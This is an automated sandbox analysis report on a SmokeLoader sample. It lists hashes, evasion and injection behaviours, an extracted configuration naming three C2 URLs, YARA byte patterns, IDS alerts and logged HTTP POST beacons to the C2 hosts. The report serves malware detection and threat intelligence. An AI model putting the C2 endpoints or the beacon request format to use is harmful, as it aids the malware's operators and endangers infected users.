Edit tour

Windows Analysis Report
50f86ebddd156619b173883981364d8955365d76d2c3a.exe

Overview

General Information

Sample name:	50f86ebddd156619b173883981364d8955365d76d2c3a.exe
Analysis ID:	1537536
MD5:	ea2e25efd40cebd5e9535b91d8e3f61f
SHA1:	85afd5690c90716eb35fe57e78c1204ee7c6eb22
SHA256:	50f86ebddd156619b173883981364d8955365d76d2c3ae9391ec911e65551be9
Tags:	exeStealcuser-abuse_ch
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected SmokeLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to read the PEB

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Sigma detected: Execution of Suspicious File Type Extension

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

50f86ebddd156619b173883981364d8955365d76d2c3a.exe (PID: 6364 cmdline: "C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe" MD5: EA2E25EFD40CEBD5E9535B91D8E3F61F)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

vbirvce (PID: 736 cmdline: C:\Users\user\AppData\Roaming\vbirvce MD5: EA2E25EFD40CEBD5E9535B91D8E3F61F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.1996874431.0000000000701000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x12490:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000005.00000002.1996782285.00000000006D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.1996782285.00000000006D0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1763780369.0000000000630000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1763780369.0000000000630000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.1996759719.00000000006C0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1763754201.0000000000620000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1763649292.0000000000502000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x12668:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1763825635.0000000000651000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1763825635.0000000000651000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.1997007041.00000000020D1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.1997007041.00000000020D1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
Click to see the 7 entries

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\vbirvce, CommandLine: C:\Users\user\AppData\Roaming\vbirvce, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\vbirvce, NewProcessName: C:\Users\user\AppData\Roaming\vbirvce, OriginalFileName: C:\Users\user\AppData\Roaming\vbirvce, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\vbirvce, ProcessId: 736, ProcessName: vbirvce

Suricata Signatures

ET MALWARE Suspected Smokeloader Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-19T06:42:26.094387+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49736	123.213.233.131	80	TCP
2024-10-19T06:43:32.196942+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49926	123.213.233.131	80	TCP
2024-10-19T06:43:33.757079+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49933	123.213.233.131	80	TCP
2024-10-19T06:43:34.927963+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49938	123.213.233.131	80	TCP
2024-10-19T06:43:36.072375+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49945	123.213.233.131	80	TCP
2024-10-19T06:43:37.345716+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49951	123.213.233.131	80	TCP
2024-10-19T06:43:38.468886+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49957	123.213.233.131	80	TCP
2024-10-19T06:43:40.184673+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49968	123.213.233.131	80	TCP
2024-10-19T06:43:41.372727+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49978	123.213.233.131	80	TCP
2024-10-19T06:43:42.747992+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49985	123.213.233.131	80	TCP
2024-10-19T06:43:44.436982+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49996	123.213.233.131	80	TCP
2024-10-19T06:43:45.772403+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50005	123.213.233.131	80	TCP
2024-10-19T06:43:46.960849+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50012	123.213.233.131	80	TCP
2024-10-19T06:43:48.349030+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50015	123.213.233.131	80	TCP
2024-10-19T06:43:49.520871+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50016	123.213.233.131	80	TCP
2024-10-19T06:43:50.849583+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50017	123.213.233.131	80	TCP
2024-10-19T06:43:52.112051+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50018	123.213.233.131	80	TCP
2024-10-19T06:43:53.952245+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50019	123.213.233.131	80	TCP
2024-10-19T06:43:55.523729+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50020	123.213.233.131	80	TCP
2024-10-19T06:43:57.079166+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50021	123.213.233.131	80	TCP
2024-10-19T06:43:58.583452+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50022	123.213.233.131	80	TCP
2024-10-19T06:43:59.965280+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50023	123.213.233.131	80	TCP
2024-10-19T06:44:01.281772+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50024	123.213.233.131	80	TCP
2024-10-19T06:44:07.514716+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50025	123.213.233.131	80	TCP
2024-10-19T06:44:12.945954+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50026	123.213.233.131	80	TCP
2024-10-19T06:44:18.935052+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50027	123.213.233.131	80	TCP
2024-10-19T06:44:25.042915+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50028	123.213.233.131	80	TCP
2024-10-19T06:44:30.639250+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50029	123.213.233.131	80	TCP
2024-10-19T06:44:36.825190+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50030	123.213.233.131	80	TCP
2024-10-19T06:44:43.048365+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50031	123.213.233.131	80	TCP
2024-10-19T06:44:48.684367+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50032	123.213.233.131	80	TCP
2024-10-19T06:44:54.566603+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50033	123.213.233.131	80	TCP
2024-10-19T06:45:00.323082+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50034	116.58.10.60	80	TCP
2024-10-19T06:45:06.946810+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50035	116.58.10.60	80	TCP
2024-10-19T06:45:13.109708+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50036	116.58.10.60	80	TCP
2024-10-19T06:45:19.786287+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50037	116.58.10.60	80	TCP
2024-10-19T06:45:26.127378+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50038	116.58.10.60	80	TCP
2024-10-19T06:45:32.897718+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50039	116.58.10.60	80	TCP
2024-10-19T06:45:39.218290+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50040	116.58.10.60	80	TCP
2024-10-19T06:45:45.340212+0200	2039103	1	A Network Trojan was detected	192.168.2.4	50041	116.58.10.60	80	TCP
2024-10-19T06:45:52.202083+0200	2039103	1	A Network Trojan was detected	192.168.2.4	61684	116.58.10.60	80	TCP
2024-10-19T06:45:58.797573+0200	2039103	1	A Network Trojan was detected	192.168.2.4	61685	116.58.10.60	80	TCP
2024-10-19T06:46:06.755173+0200	2039103	1	A Network Trojan was detected	192.168.2.4	61686	116.58.10.60	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 50f86ebddd156619b173883981364d8955365d76d2c3a.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\vbirvce

Avira: detection malicious, Label: HEUR/AGEN.1310247

Found malware configuration

Source: 00000005.00000002.1996782285.00000000006D0000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Multi AV Scanner detection for domain / URL

Source: unicea.ws	Virustotal: Detection: 11%			Perma Link
Source: nwgrus.ru	Virustotal: Detection: 12%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\vbirvce

ReversingLabs: Detection: 73%

Multi AV Scanner detection for submitted file

Source: 50f86ebddd156619b173883981364d8955365d76d2c3a.exe	ReversingLabs: Detection: 73%
Source: 50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Virustotal: Detection: 60%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\vbirvce

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 50f86ebddd156619b173883981364d8955365d76d2c3a.exe

Joe Sandbox ML: detected

Source: 50f86ebddd156619b173883981364d8955365d76d2c3a.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49926 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49938 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49945 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49933 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49951 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49957 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49978 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49968 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49985 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49996 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50005 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50015 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50012 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50018 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50020 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50019 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50027 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50025 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50026 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50023 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50032 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50031 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50016 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50021 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50034 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50033 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50029 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50022 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50039 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50041 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50024 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:61685 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50028 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:61686 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50036 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50035 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50040 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50037 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50038 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50017 -> 123.213.233.131:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:61684 -> 116.58.10.60:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50030 -> 123.213.233.131:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 116.58.10.60 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 123.213.233.131 80			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://nwgrus.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://tech-servers.in.net/tmp/index.php
Source: Malware configuration extractor	URLs: http://unicea.ws/tmp/index.php

Source: Joe Sandbox View	IP Address: 116.58.10.60 116.58.10.60
Source: Joe Sandbox View	IP Address: 123.213.233.131 123.213.233.131

Source: Joe Sandbox View	ASN Name: NEXLINX-AS-APAutonomousSystemNumberforNexlinxPK NEXLINX-AS-APAutonomousSystemNumberforNexlinxPK
Source: Joe Sandbox View	ASN Name: SKB-ASSKBroadbandCoLtdKR SKB-ASSKBroadbandCoLtdKR

Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://phdqgddkvvudcrt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fnmiroofcti.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://irneakwnfjo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tbpxxwuuktsgi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lcmemwnyvfua.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://supcacejjlal.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 256Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gfxdwdqexxrn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pcavojwgokxdrh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rjqbihcnrwkn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dchxksvmirnse.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hhfxvhfrxxonmmed.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qvjyoylilnetkk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qpewsiogiap.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ogxfbekgdosi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 369Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tvtkflumbvrf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 350Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mlktwknksogej.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rnhsdeqcuhv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://potyjbnxqkwihrq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 345Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://twhmygynknwaynw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 210Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vqovnajgvrg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://iqalmqarlgoleo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://manlfvrucld.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bmtcjbsxoypbehg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: unicea.ws
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hyntfrjgoodahxw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: unicea.ws
